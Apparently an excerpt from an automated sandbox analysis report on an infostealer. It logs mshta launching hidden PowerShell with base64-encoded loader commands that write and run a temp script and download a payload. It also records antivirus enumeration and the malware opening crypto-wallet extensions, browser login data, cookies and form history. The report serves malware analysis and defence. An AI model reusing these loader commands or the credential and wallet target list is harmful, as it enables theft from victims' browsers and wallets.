luujnqunjqulnqwdbqzbbvndccefhnefaquj2quhjqvv3qjbbsgtbykfcbefdquftqujwqudrqvpbqmxbrzrboy4gjgvudjpuzw1wxgeuchmxoybmdw5jdglvbibleudzclvvrcgpe2z1bmn0aw9uigv6cennzghhusgkckhqzwipe2lmkceovgvzdc1qyxroic1qyxroicruaejfwhbpvk8pkxtjdxjsichlrmjdicrysfblyikglw8gjfroqkvycglwt319fut5r1lyvvveow==')))
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4a;. $env:temp\a.ps1; function kygyruud(){function ezpcmdhgq($rhpeb){if(!(test-path -path $thbexpivo)){curl (kfbc $rhpeb) -o $thbexpivo}}}kygyruud;"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4a;. $env:temp\a.ps1; function kygyruud(){function ezpcmdhgq($rhpeb){if(!(test-path -path $thbexpivo)){curl (kfbc $rhpeb) -o $thbexpivo}}}kygyruud;"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4a
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep unrestricted -w 1 sc $env:temp\a.ps1 ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24gs0ziqygks3lhwxjvvuqpew0kkcgks3lhwxjvvuqglxnwbgl0iccopzw9xeculiknfcv7jevkdxauu3viu3ryaw5nkdmsmtawkvskx119ksaglwpvaw4gjycglxjlcgxhy2ugii4kiil9oyrfsnvwid0nawv4bxz7du4xautgzsjbt0v1vnk1im9zezzqbfbhlzphyjrjwi5pyjjxltdxo0nksfxneff3l016skfqcnqzqdzcfurojx5ubluoftbrc3nfacvoswzrkwm5wew4ncnaunltkm9hcdy1mdk1odm0ndewotm2ndmynda2mdk2otu4jw==')));cmd.exe /k start powershell -w 1 ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('cg93zxjzagvsbcatzw5jifv3qjbbr0vby2dcmefdmefvquj5quc4qvl3qmxbse1by3dbz0fdsufrd0e2quz3qvz3qnbbrzrbwkfcdkfiy0fjd0jjquznqwvrqnpbrmnbyndcm0fewufoqujjquzjqwfrqnvbr1fbyndcm0fitufvquj2quhjqvprqnlbrk1byufcbefhd0fiqujjquhzqu1rqxvbrefbwefcd0fhoefkd0jsquhjqwn3qm9br1vbykfcc0fdnefauui0qudvqulnqwdbqzbbuvfceufhy0fkuuj0qudvqwjnqjbbrxdbyvfcekfiuufjqufpqumwqwr3qwdbr2dbyvfca0fhuufauuj1qunbquxrqmxbsefbsufcaufia0fjqujoquhnqwn3qwdbqzbbymdcdkfiqufjquf0quvnqwj3qnrbrzbbwvfcdufhuufjqujnqunjqwfrqmxbsgdbsufbb0fdz0fuz0jsquhjquxrqlbbr0lbywdcbefhtufkqufnquznqwvrqnpbsffbwlfcdefdnefuz0jsquhrquxnqlhbr1vbwwdcrefhd0fhuujsquc0qwrbqxbbqzrbukfcdkfiy0fiz0jzquc4qvlrqmtbrk1bzefceufha0fiz0juqunnqup3qm9bsffbzefcd0fitufpz0f2qum4qwr3qmxbr0lbtgdcckfhd0fhuuj3qudrqwvrqjnbrzhbzwdccefia0fmz0j6qudnqwj3qndbqzhbyxdcmufhnefiz0joquhjquxnqndbrzrbwndbbkfda0fluujnqunjqulnqwdbqzbbvndccefhnefaquj2quhjqvv3qjbbsgtbykfcbefdquftqujwqudrqvpbqmxbrzrboy4gjgvudjpuzw1wxgeuchmxoybmdw5jdglvbibleudzclvvrcgpe2z1bmn0aw9uigv6cennzghhusgkckhqzwipe2lmkceovgvzdc1qyxroic1qyxroicruaejfwhbpvk8pkxtjdxjsichlrmjdicrysfblyikglw8gjfroqkvycglwt319fut5r1lyvvveow==')))Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4a;. $env:temp\a.ps1; function kygyruud(){function ezpcmdhgq($rhpeb){if(!(test-path -path $thbexpivo)){curl (kfbc $rhpeb) -o $thbexpivo}}}kygyruud;"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4a;. $env:temp\a.ps1; function kygyruud(){function ezpcmdhgq($rhpeb){if(!(test-path -path $thbexpivo)){curl (kfbc $rhpeb) -o $thbexpivo}}}kygyruud;"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc uwb0ageacgb0ac0auabyag8aywblahmacwagaciaqwa6afwavwbpag4azabvahcacwbcafmaeqbzafcabwb3adyanabcafcaaqbuagqabwb3ahmauabvahcazqbyafmaaablagwababcahyamqauadaaxabwag8adwblahiacwboaguababsac4azqb4aguaigagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaaiac0adwagaggaaqbkagqazqbuacaalqblahaaiabiahkacabhahmacwagac0abgbvahaaiaataemabwbtag0ayqbuagqaiabgaciaaqblahgaiaaoacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8adwblagialgbragwaaqbwagqaeqb3ag8aegbpahkalgbzaggabwbwac8aawb1ag4abgbhahialgbwag4azwanackakqbgaciaigagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: powershell.exe, 00000013.00000002.3699746271.0000000003527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: powershell.exe, 00000013.00000002.3699746271.0000000003527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: powershell.exe, 00000013.00000002.3699746271.0000000003527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: powershell.exe, 00000013.00000002.3699746271.0000000003527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: powershell.exe, 00000007.00000002.3782743007.00000000070A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .C:\Users\user\AppData\Roaming\Ledger Live8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
